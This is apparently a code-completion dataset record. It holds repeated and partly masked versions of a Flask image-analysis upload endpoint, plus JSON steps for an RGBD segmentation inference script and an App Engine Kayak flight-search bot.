binarization.adatativeImage()
binarization.fondoMorfologico()
m, color, diametro, pre = binarization.analize()
return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',
'm': m, 'color': color, 'diametro': diametro, 'pre': pre})
return json.dumps({'ok': False})
<|reserved_special_token_1|>
<|reserved_special_token_0|>
CORS(app)
@app.route('/')
def hello():
return 'Hello word'
@app.route('/analyze', methods=['POST'])
def analyze():
if request.method == 'POST':
image_file = request.files['image']
file_name = secure_filename(image_file.filename)
image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))
print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[
'UPLOAD_FOLDER']))
binarization = Binarizacion(f'./public/files/{file_name}')
binarization.binaryImage()
binarization.otsuImage()
binarization.adatativeImage()
binarization.fondoMorfologico()
m, color, diametro, pre = binarization.analize()
return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',
'm': m, 'color': color, 'diametro': diametro, 'pre': pre})
return json.dumps({'ok': False})
<|reserved_special_token_1|>
<|reserved_special_token_0|>
UPLOAD_FOLDER = './public/files'
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
CORS(app)
@app.route('/')
def hello():
return 'Hello word'
@app.route('/analyze', methods=['POST'])
def analyze():
if request.method == 'POST':
image_file = request.files['image']
file_name = secure_filename(image_file.filename)
image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))
print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[
'UPLOAD_FOLDER']))
binarization = Binarizacion(f'./public/files/{file_name}')
binarization.binaryImage()
binarization.otsuImage()
binarization.adatativeImage()
binarization.fondoMorfologico()
m, color, diametro, pre = binarization.analize()
return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',
'm': m, 'color': color, 'diametro': diametro, 'pre': pre})
return json.dumps({'ok': False})
<|reserved_special_token_1|>
import json
import os
from flask import Flask, request, url_for
from flask_cors import CORS
from werkzeug.utils import secure_filename
from service.Binarizacion import Binarizacion
UPLOAD_FOLDER = './public/files'
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
CORS(app)
@app.route('/')
def hello():
return 'Hello word'
@app.route('/analyze', methods=['POST'])
def analyze():
if request.method == 'POST':
image_file = request.files['image']
file_name = secure_filename(image_file.filename)
image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))
print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[
'UPLOAD_FOLDER']))
binarization = Binarizacion(f'./public/files/{file_name}')
binarization.binaryImage()
binarization.otsuImage()
binarization.adatativeImage()
binarization.fondoMorfologico()
m, color, diametro, pre = binarization.analize()
return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',
'm': m, 'color': color, 'diametro': diametro, 'pre': pre})
return json.dumps({'ok': False})
<|reserved_special_token_1|>
import json
import os
from flask import Flask, request, url_for
from flask_cors import CORS
from werkzeug.utils import secure_filename
from service.Binarizacion import Binarizacion
UPLOAD_FOLDER = './public/files'
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
CORS(app)
@app.route('/')
def hello():
return 'Hello word'
@app.route('/analyze', methods=['POST'])
def analyze():
if request.method == 'POST':
image_file = request.files['image']
file_name = secure_filename(image_file.filename)
# image_file.save('./public/files/' + secure_filename(image_file.filename))
image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))
print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config['UPLOAD_FOLDER']))
binarization = Binarizacion(f'./public/files/{file_name}')
binarization.binaryImage()
binarization.otsuImage()
binarization.adatativeImage()
binarization.fondoMorfologico()
m, color, diametro, pre = binarization.analize()
return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',
'm': m,
'color': color,
'diametro': diametro,
'pre': pre})
return json.dumps({'ok': False})
|
flexible
|
{
"blob_id": "b9c8689dbdf451e6a981f1abdae55771266fe231",
"index": 9129,
"step-1": "<mask token>\n\n\[email protected]('/')\ndef hello():\n return 'Hello word'\n\n\[email protected]('/analyze', methods=['POST'])\ndef analyze():\n if request.method == 'POST':\n image_file = request.files['image']\n file_name = secure_filename(image_file.filename)\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))\n print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[\n 'UPLOAD_FOLDER']))\n binarization = Binarizacion(f'./public/files/{file_name}')\n binarization.binaryImage()\n binarization.otsuImage()\n binarization.adatativeImage()\n binarization.fondoMorfologico()\n m, color, diametro, pre = binarization.analize()\n return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',\n 'm': m, 'color': color, 'diametro': diametro, 'pre': pre})\n return json.dumps({'ok': False})\n",
"step-2": "<mask token>\nCORS(app)\n\n\[email protected]('/')\ndef hello():\n return 'Hello word'\n\n\[email protected]('/analyze', methods=['POST'])\ndef analyze():\n if request.method == 'POST':\n image_file = request.files['image']\n file_name = secure_filename(image_file.filename)\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))\n print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[\n 'UPLOAD_FOLDER']))\n binarization = Binarizacion(f'./public/files/{file_name}')\n binarization.binaryImage()\n binarization.otsuImage()\n binarization.adatativeImage()\n binarization.fondoMorfologico()\n m, color, diametro, pre = binarization.analize()\n return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',\n 'm': m, 'color': color, 'diametro': diametro, 'pre': pre})\n return json.dumps({'ok': False})\n",
"step-3": "<mask token>\nUPLOAD_FOLDER = './public/files'\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\nCORS(app)\n\n\[email protected]('/')\ndef hello():\n return 'Hello word'\n\n\[email protected]('/analyze', methods=['POST'])\ndef analyze():\n if request.method == 'POST':\n image_file = request.files['image']\n file_name = secure_filename(image_file.filename)\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))\n print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[\n 'UPLOAD_FOLDER']))\n binarization = Binarizacion(f'./public/files/{file_name}')\n binarization.binaryImage()\n binarization.otsuImage()\n binarization.adatativeImage()\n binarization.fondoMorfologico()\n m, color, diametro, pre = binarization.analize()\n return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',\n 'm': m, 'color': color, 'diametro': diametro, 'pre': pre})\n return json.dumps({'ok': False})\n",
"step-4": "import json\nimport os\nfrom flask import Flask, request, url_for\nfrom flask_cors import CORS\nfrom werkzeug.utils import secure_filename\nfrom service.Binarizacion import Binarizacion\nUPLOAD_FOLDER = './public/files'\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\nCORS(app)\n\n\[email protected]('/')\ndef hello():\n return 'Hello word'\n\n\[email protected]('/analyze', methods=['POST'])\ndef analyze():\n if request.method == 'POST':\n image_file = request.files['image']\n file_name = secure_filename(image_file.filename)\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))\n print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[\n 'UPLOAD_FOLDER']))\n binarization = Binarizacion(f'./public/files/{file_name}')\n binarization.binaryImage()\n binarization.otsuImage()\n binarization.adatativeImage()\n binarization.fondoMorfologico()\n m, color, diametro, pre = binarization.analize()\n return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',\n 'm': m, 'color': color, 'diametro': diametro, 'pre': pre})\n return json.dumps({'ok': False})\n",
"step-5": "import json\nimport os\n\nfrom flask import Flask, request, url_for\nfrom flask_cors import CORS\nfrom werkzeug.utils import secure_filename\n\nfrom service.Binarizacion import Binarizacion\n\nUPLOAD_FOLDER = './public/files'\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nCORS(app)\n\[email protected]('/')\ndef hello():\n return 'Hello word'\n\[email protected]('/analyze', methods=['POST'])\ndef analyze():\n if request.method == 'POST':\n image_file = request.files['image']\n file_name = secure_filename(image_file.filename)\n # image_file.save('./public/files/' + secure_filename(image_file.filename))\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))\n \n print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config['UPLOAD_FOLDER']))\n binarization = Binarizacion(f'./public/files/{file_name}')\n binarization.binaryImage()\n binarization.otsuImage()\n binarization.adatativeImage()\n binarization.fondoMorfologico()\n \n m, color, diametro, pre = binarization.analize()\n \n return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',\n 'm': m,\n 'color': color,\n 'diametro': diametro,\n 'pre': pre})\n \n return json.dumps({'ok': False})\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
"""
.. codeauthor:: Daniel Seichter <[email protected]>
"""
import argparse
from glob import glob
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
import torch
import torch.nn.functional as F
from src.args import ArgumentParserRGBDSegmentation
from src.build_model import build_model
from src.prepare_data import prepare_data
HOME = os.environ["HOME"]
def _load_img(fp):
img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)
if img.ndim == 3:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
return img
if __name__ == "__main__":
# arguments
parser = ArgumentParserRGBDSegmentation(
description="Efficient RGBD Indoor Sematic Segmentation (Inference)",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--data_root",
type=str,
default=HOME + "/bags/june_25th/kinect_rgbd_person_act",
help="Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth",
)
parser.set_common_args()
parser.add_argument(
"--ckpt_path",
type=str,
default="trained_models/nyuv2/r34_NBt1D_scenenet.pth",
# default="trained_models/sunrgbd/r34_NBt1D.pth",
help="Path to the checkpoint of the trained model.",
)
parser.add_argument(
"--depth_scale",
type=float,
default=1.0,
help="Additional depth scaling factor to apply.",
)
args = parser.parse_args()
# dataset
# TODO: set dataset to be sunrgbd
# args.dataset = "sunrgbd"
args.pretrained_on_imagenet = False # we are loading other weights anyway
dataset, preprocessor = prepare_data(args, with_input_orig=True)
n_classes = dataset.n_classes_without_void
# model and checkpoint loading
model, device = build_model(args, n_classes=n_classes)
checkpoint = torch.load(args.ckpt_path, map_location=lambda storage, loc: storage)
model.load_state_dict(checkpoint["state_dict"])
print("Loaded checkpoint from {}".format(args.ckpt_path))
model.eval()
model.to(device)
# get samples
rgb_filepaths = sorted(glob(os.path.join(args.data_root, "color/*.jpg")))
depth_filepaths = sorted(glob(os.path.join(args.data_root, "depth/*.png")))
assert args.modality == "rgbd", "Only RGBD inference supported so far"
assert len(rgb_filepaths) == len(depth_filepaths)
filepaths = zip(rgb_filepaths, depth_filepaths)
# inference
for fp_rgb, fp_depth in filepaths:
# load sample
img_rgb = _load_img(fp_rgb)
img_depth = _load_img(fp_depth).astype("float32") * args.depth_scale
h, w, _ = img_rgb.shape
# preprocess sample
sample = preprocessor({"image": img_rgb, "depth": img_depth})
# add batch axis and copy to device
image = sample["image"][None].to(device)
depth = sample["depth"][None].to(device)
# apply network
pred = model(image, depth)
pred = F.interpolate(pred, (h, w), mode="bilinear", align_corners=False)
pred = torch.argmax(pred, dim=1)
pred = pred.cpu().numpy().squeeze().astype(np.uint8)
# show result
pred_colored = dataset.color_label(pred, with_void=False)
fig, axs = plt.subplots(1, 3, figsize=(16, 3))
[ax.set_axis_off() for ax in axs.ravel()]
axs[0].imshow(img_rgb)
axs[1].imshow(img_depth, cmap="gray")
axs[2].imshow(pred_colored)
plt.suptitle(
f"Image: ({os.path.basename(fp_rgb)}, "
f"{os.path.basename(fp_depth)}), Model: {args.ckpt_path}"
)
# plt.savefig('./result.jpg', dpi=150)
plt.show()
|
normal
|
{
"blob_id": "559e46aa4e9b55f8c01acf30fa01e106ab914116",
"index": 5687,
"step-1": "<mask token>\n\n\ndef _load_img(fp):\n img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)\n if img.ndim == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _load_img(fp):\n img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)\n if img.ndim == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\n\nif __name__ == '__main__':\n parser = ArgumentParserRGBDSegmentation(description=\n 'Efficient RGBD Indoor Sematic Segmentation (Inference)',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--data_root', type=str, default=HOME +\n '/bags/june_25th/kinect_rgbd_person_act', help=\n 'Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth'\n )\n parser.set_common_args()\n parser.add_argument('--ckpt_path', type=str, default=\n 'trained_models/nyuv2/r34_NBt1D_scenenet.pth', help=\n 'Path to the checkpoint of the trained model.')\n parser.add_argument('--depth_scale', type=float, default=1.0, help=\n 'Additional depth scaling factor to apply.')\n args = parser.parse_args()\n args.pretrained_on_imagenet = False\n dataset, preprocessor = prepare_data(args, with_input_orig=True)\n n_classes = dataset.n_classes_without_void\n model, device = build_model(args, n_classes=n_classes)\n checkpoint = torch.load(args.ckpt_path, map_location=lambda storage,\n loc: storage)\n model.load_state_dict(checkpoint['state_dict'])\n print('Loaded checkpoint from {}'.format(args.ckpt_path))\n model.eval()\n model.to(device)\n rgb_filepaths = sorted(glob(os.path.join(args.data_root, 'color/*.jpg')))\n depth_filepaths = sorted(glob(os.path.join(args.data_root, 'depth/*.png')))\n assert args.modality == 'rgbd', 'Only RGBD inference supported so far'\n assert len(rgb_filepaths) == len(depth_filepaths)\n filepaths = zip(rgb_filepaths, depth_filepaths)\n for fp_rgb, fp_depth in filepaths:\n img_rgb = _load_img(fp_rgb)\n img_depth = _load_img(fp_depth).astype('float32') * args.depth_scale\n h, w, _ = img_rgb.shape\n sample = preprocessor({'image': img_rgb, 'depth': img_depth})\n image = sample['image'][None].to(device)\n depth = 
sample['depth'][None].to(device)\n pred = model(image, depth)\n pred = F.interpolate(pred, (h, w), mode='bilinear', align_corners=False\n )\n pred = torch.argmax(pred, dim=1)\n pred = pred.cpu().numpy().squeeze().astype(np.uint8)\n pred_colored = dataset.color_label(pred, with_void=False)\n fig, axs = plt.subplots(1, 3, figsize=(16, 3))\n [ax.set_axis_off() for ax in axs.ravel()]\n axs[0].imshow(img_rgb)\n axs[1].imshow(img_depth, cmap='gray')\n axs[2].imshow(pred_colored)\n plt.suptitle(\n f'Image: ({os.path.basename(fp_rgb)}, {os.path.basename(fp_depth)}), Model: {args.ckpt_path}'\n )\n plt.show()\n",
"step-3": "<mask token>\nHOME = os.environ['HOME']\n\n\ndef _load_img(fp):\n img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)\n if img.ndim == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\n\nif __name__ == '__main__':\n parser = ArgumentParserRGBDSegmentation(description=\n 'Efficient RGBD Indoor Sematic Segmentation (Inference)',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--data_root', type=str, default=HOME +\n '/bags/june_25th/kinect_rgbd_person_act', help=\n 'Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth'\n )\n parser.set_common_args()\n parser.add_argument('--ckpt_path', type=str, default=\n 'trained_models/nyuv2/r34_NBt1D_scenenet.pth', help=\n 'Path to the checkpoint of the trained model.')\n parser.add_argument('--depth_scale', type=float, default=1.0, help=\n 'Additional depth scaling factor to apply.')\n args = parser.parse_args()\n args.pretrained_on_imagenet = False\n dataset, preprocessor = prepare_data(args, with_input_orig=True)\n n_classes = dataset.n_classes_without_void\n model, device = build_model(args, n_classes=n_classes)\n checkpoint = torch.load(args.ckpt_path, map_location=lambda storage,\n loc: storage)\n model.load_state_dict(checkpoint['state_dict'])\n print('Loaded checkpoint from {}'.format(args.ckpt_path))\n model.eval()\n model.to(device)\n rgb_filepaths = sorted(glob(os.path.join(args.data_root, 'color/*.jpg')))\n depth_filepaths = sorted(glob(os.path.join(args.data_root, 'depth/*.png')))\n assert args.modality == 'rgbd', 'Only RGBD inference supported so far'\n assert len(rgb_filepaths) == len(depth_filepaths)\n filepaths = zip(rgb_filepaths, depth_filepaths)\n for fp_rgb, fp_depth in filepaths:\n img_rgb = _load_img(fp_rgb)\n img_depth = _load_img(fp_depth).astype('float32') * args.depth_scale\n h, w, _ = img_rgb.shape\n sample = preprocessor({'image': img_rgb, 'depth': img_depth})\n image = 
sample['image'][None].to(device)\n depth = sample['depth'][None].to(device)\n pred = model(image, depth)\n pred = F.interpolate(pred, (h, w), mode='bilinear', align_corners=False\n )\n pred = torch.argmax(pred, dim=1)\n pred = pred.cpu().numpy().squeeze().astype(np.uint8)\n pred_colored = dataset.color_label(pred, with_void=False)\n fig, axs = plt.subplots(1, 3, figsize=(16, 3))\n [ax.set_axis_off() for ax in axs.ravel()]\n axs[0].imshow(img_rgb)\n axs[1].imshow(img_depth, cmap='gray')\n axs[2].imshow(pred_colored)\n plt.suptitle(\n f'Image: ({os.path.basename(fp_rgb)}, {os.path.basename(fp_depth)}), Model: {args.ckpt_path}'\n )\n plt.show()\n",
"step-4": "<mask token>\nimport argparse\nfrom glob import glob\nimport os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn.functional as F\nfrom src.args import ArgumentParserRGBDSegmentation\nfrom src.build_model import build_model\nfrom src.prepare_data import prepare_data\nHOME = os.environ['HOME']\n\n\ndef _load_img(fp):\n img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)\n if img.ndim == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\n\nif __name__ == '__main__':\n parser = ArgumentParserRGBDSegmentation(description=\n 'Efficient RGBD Indoor Sematic Segmentation (Inference)',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--data_root', type=str, default=HOME +\n '/bags/june_25th/kinect_rgbd_person_act', help=\n 'Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth'\n )\n parser.set_common_args()\n parser.add_argument('--ckpt_path', type=str, default=\n 'trained_models/nyuv2/r34_NBt1D_scenenet.pth', help=\n 'Path to the checkpoint of the trained model.')\n parser.add_argument('--depth_scale', type=float, default=1.0, help=\n 'Additional depth scaling factor to apply.')\n args = parser.parse_args()\n args.pretrained_on_imagenet = False\n dataset, preprocessor = prepare_data(args, with_input_orig=True)\n n_classes = dataset.n_classes_without_void\n model, device = build_model(args, n_classes=n_classes)\n checkpoint = torch.load(args.ckpt_path, map_location=lambda storage,\n loc: storage)\n model.load_state_dict(checkpoint['state_dict'])\n print('Loaded checkpoint from {}'.format(args.ckpt_path))\n model.eval()\n model.to(device)\n rgb_filepaths = sorted(glob(os.path.join(args.data_root, 'color/*.jpg')))\n depth_filepaths = sorted(glob(os.path.join(args.data_root, 'depth/*.png')))\n assert args.modality == 'rgbd', 'Only RGBD inference supported so far'\n assert len(rgb_filepaths) == len(depth_filepaths)\n 
filepaths = zip(rgb_filepaths, depth_filepaths)\n for fp_rgb, fp_depth in filepaths:\n img_rgb = _load_img(fp_rgb)\n img_depth = _load_img(fp_depth).astype('float32') * args.depth_scale\n h, w, _ = img_rgb.shape\n sample = preprocessor({'image': img_rgb, 'depth': img_depth})\n image = sample['image'][None].to(device)\n depth = sample['depth'][None].to(device)\n pred = model(image, depth)\n pred = F.interpolate(pred, (h, w), mode='bilinear', align_corners=False\n )\n pred = torch.argmax(pred, dim=1)\n pred = pred.cpu().numpy().squeeze().astype(np.uint8)\n pred_colored = dataset.color_label(pred, with_void=False)\n fig, axs = plt.subplots(1, 3, figsize=(16, 3))\n [ax.set_axis_off() for ax in axs.ravel()]\n axs[0].imshow(img_rgb)\n axs[1].imshow(img_depth, cmap='gray')\n axs[2].imshow(pred_colored)\n plt.suptitle(\n f'Image: ({os.path.basename(fp_rgb)}, {os.path.basename(fp_depth)}), Model: {args.ckpt_path}'\n )\n plt.show()\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\n.. codeauthor:: Daniel Seichter <[email protected]>\n\"\"\"\nimport argparse\nfrom glob import glob\nimport os\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn.functional as F\n\nfrom src.args import ArgumentParserRGBDSegmentation\nfrom src.build_model import build_model\nfrom src.prepare_data import prepare_data\n\nHOME = os.environ[\"HOME\"]\n\n\ndef _load_img(fp):\n img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)\n if img.ndim == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\n\nif __name__ == \"__main__\":\n # arguments\n parser = ArgumentParserRGBDSegmentation(\n description=\"Efficient RGBD Indoor Sematic Segmentation (Inference)\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"--data_root\",\n type=str,\n default=HOME + \"/bags/june_25th/kinect_rgbd_person_act\",\n help=\"Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth\",\n )\n parser.set_common_args()\n parser.add_argument(\n \"--ckpt_path\",\n type=str,\n default=\"trained_models/nyuv2/r34_NBt1D_scenenet.pth\",\n # default=\"trained_models/sunrgbd/r34_NBt1D.pth\",\n help=\"Path to the checkpoint of the trained model.\",\n )\n parser.add_argument(\n \"--depth_scale\",\n type=float,\n default=1.0,\n help=\"Additional depth scaling factor to apply.\",\n )\n args = parser.parse_args()\n\n # dataset\n # TODO: set dataset to be sunrgbd\n # args.dataset = \"sunrgbd\"\n args.pretrained_on_imagenet = False # we are loading other weights anyway\n dataset, preprocessor = prepare_data(args, with_input_orig=True)\n n_classes = dataset.n_classes_without_void\n\n # model and checkpoint loading\n model, device = build_model(args, n_classes=n_classes)\n checkpoint = torch.load(args.ckpt_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint[\"state_dict\"])\n print(\"Loaded 
checkpoint from {}\".format(args.ckpt_path))\n\n model.eval()\n model.to(device)\n\n # get samples\n rgb_filepaths = sorted(glob(os.path.join(args.data_root, \"color/*.jpg\")))\n depth_filepaths = sorted(glob(os.path.join(args.data_root, \"depth/*.png\")))\n assert args.modality == \"rgbd\", \"Only RGBD inference supported so far\"\n assert len(rgb_filepaths) == len(depth_filepaths)\n filepaths = zip(rgb_filepaths, depth_filepaths)\n\n # inference\n for fp_rgb, fp_depth in filepaths:\n # load sample\n img_rgb = _load_img(fp_rgb)\n img_depth = _load_img(fp_depth).astype(\"float32\") * args.depth_scale\n h, w, _ = img_rgb.shape\n\n # preprocess sample\n sample = preprocessor({\"image\": img_rgb, \"depth\": img_depth})\n\n # add batch axis and copy to device\n image = sample[\"image\"][None].to(device)\n depth = sample[\"depth\"][None].to(device)\n\n # apply network\n pred = model(image, depth)\n pred = F.interpolate(pred, (h, w), mode=\"bilinear\", align_corners=False)\n pred = torch.argmax(pred, dim=1)\n pred = pred.cpu().numpy().squeeze().astype(np.uint8)\n\n # show result\n pred_colored = dataset.color_label(pred, with_void=False)\n fig, axs = plt.subplots(1, 3, figsize=(16, 3))\n [ax.set_axis_off() for ax in axs.ravel()]\n axs[0].imshow(img_rgb)\n axs[1].imshow(img_depth, cmap=\"gray\")\n axs[2].imshow(pred_colored)\n\n plt.suptitle(\n f\"Image: ({os.path.basename(fp_rgb)}, \"\n f\"{os.path.basename(fp_depth)}), Model: {args.ckpt_path}\"\n )\n # plt.savefig('./result.jpg', dpi=150)\n plt.show()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import os
import re
import logging
import time
from string import replace
from settings import *
import wsgiref.handlers
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from modules.xml2dict import *
from modules import kayak
from modules.messaging import *
from modules.cron import *
# Module-level Kayak API client built from settings.
# NOTE: this rebinds the imported `kayak` module name to a client instance;
# all later references to `kayak` in this file mean the client, not the module.
kayak = kayak.Kayak(
    SETTINGS['Kayak']['API_TOKEN'],
    SETTINGS['Kayak']['BASE_URL'],
)
class MainHandler(webapp.RequestHandler):
    """Handler for '/'. Currently a no-op placeholder."""

    def get(self):
        # FIX: the disabled mention-listing view below was kept as a bare
        # triple-quoted string expression after `pass` (evaluated and
        # discarded at runtime); keep it as comments instead so it is
        # unmistakably dead code.
        #
        # messages = twitter.statuses.mentions()
        # mydict = {'messages': {}}
        # counter = 0
        # for message in messages:
        #     mydict['messages'][('%s' % counter)] = message
        #     counter += 1
        # path = os.path.join(os.path.dirname(__file__), 'templates/index.html')
        # self.response.out.write(template.render(path, mydict))
        pass
class CronHandler(webapp.RequestHandler):
    """Handler for '/cron': bootstraps the scheduler and runs due jobs."""

    def get(self):
        scheduler = Cron()
        scheduler.init_scheduler()
        scheduler.run()
class KayakApi(webapp.RequestHandler):
    """Handler for '/api/kayak': searches Kayak for the trip parsed from
    incoming messages and renders the resulting trips."""

    def get(self):
        # Parse trip details (from/to/departure/retour) out of new messages.
        messaging = Messaging()
        messaging.collect_messages()
        messaging.process_messages()

        # Open a Kayak API session and capture its session id + cookie.
        kayak_session = kayak.get_session()
        logging.debug(kayak_session.content)
        session_id = re.search('<sid>(.*?)</sid>', kayak_session.content)
        session_id = session_id.group(1)
        kayak.session_id = session_id
        kayak.headers = {'Cookie': kayak_session.headers['set-cookie']}

        # Kick off the search with day/month/year date strings.
        departure = messaging.mentions['departure']
        retour = messaging.mentions['retour']
        kayak_search = kayak.post_search(
            messaging.mentions['from'],
            messaging.mentions['to'],
            departure['day'] + '/' + departure['month'] + '/' + departure['year'],
            retour['day'] + '/' + retour['month'] + '/' + retour['year'],
        )
        logging.debug(kayak_search.content)

        search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.content)
        search_id = search_id.group(1)
        kayak.search_id = search_id

        kayak_results = kayak.get_results()
        logging.debug(kayak_results.content)

        result_set = ''
        # BUG FIX: re.search returns None when the marker is absent; the old
        # code called .group(0) on that result unconditionally and raised
        # AttributeError for every completed search. Test for a match instead.
        more_pending = re.search('<morepending>true</morepending>',
                                 kayak_results.content) is not None
        if more_pending:
            # Kayak is still gathering results; give it time to finish.
            time.sleep(10)
            kayak_results = kayak.get_results()
            result_set = kayak_results.content
            logging.debug(kayak_results.content)

        # NOTE(review): replacing '&' with '&' is a no-op as written; the
        # original intent was probably unescaping '&amp;' -- confirm.
        content = replace(result_set, '&', '&')
        xml = XML2Dict()
        trips = xml.fromstring(content)
        trip_dict = {'trips': trips}
        path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')
        self.response.out.write(template.render(path, trip_dict))
class KayakHandler(webapp.RequestHandler):
    """Handler for '/kayak': renders a saved Kayak result fixture."""

    def get(self):
        # FIX: close the fixture file deterministically (it was leaked
        # before). try/finally keeps this compatible with old runtimes.
        fixture = open('kayak-result.xml', 'r')
        try:
            content = fixture.read()
        finally:
            fixture.close()
        # NOTE(review): replacing '&' with '&' is a no-op as written; the
        # original intent was probably unescaping '&amp;' -- confirm.
        content = replace(content, '&', '&')
        xml = XML2Dict()
        trips = xml.fromstring(content)
        trip_dict = {'trips': trips}
        path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')
        self.response.out.write(template.render(path, trip_dict))
class ClearTripHandler(webapp.RequestHandler):
    """Handler for '/cleartrip': renders a saved ClearTrip result fixture."""

    def get(self):
        # FIX: close the fixture file deterministically (it was leaked
        # before). try/finally keeps this compatible with old runtimes.
        fixture = open('result.xml', 'r')
        try:
            content = fixture.read()
        finally:
            fixture.close()
        # NOTE(review): replacing '&' with '&' is a no-op as written; the
        # original intent was probably unescaping '&amp;' -- confirm.
        content = replace(content, '&', '&')
        xml = XML2Dict()
        trips = xml.fromstring(content)
        trip_dict = {'trips': trips}
        path = os.path.join(os.path.dirname(__file__), 'templates/cleartrip.html')
        self.response.out.write(template.render(path, trip_dict))
class MessageParser(webapp.RequestHandler):
    """Handler for '/messaging': dumps the parsed mentions for debugging."""

    def get(self):
        parser = Messaging()
        parser.collect_messages()
        parser.process_messages()
        self.response.out.write(parser.mentions)
def main():
    """Configure debug logging and serve the WSGI application over CGI."""
    logging.getLogger().setLevel(logging.DEBUG)
    routes = [
        ('/', MainHandler),
        ('/kayak', KayakHandler),
        ('/cleartrip', ClearTripHandler),
        ('/cron', CronHandler),
        ('/api/kayak', KayakApi),
        ('/messaging', MessageParser),
    ]
    application = webapp.WSGIApplication(routes, debug=True)
    wsgiref.handlers.CGIHandler().run(application)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "08568c31e5a404957c11eca9cbc9472c71cf088b",
"index": 9546,
"step-1": "<mask token>\n\n\nclass KayakHandler(webapp.RequestHandler):\n <mask token>\n\n\nclass ClearTripHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__),\n 'templates/cleartrip.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass MessageParser(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n self.response.out.write(messaging.mentions)\n\n\n<mask token>\n",
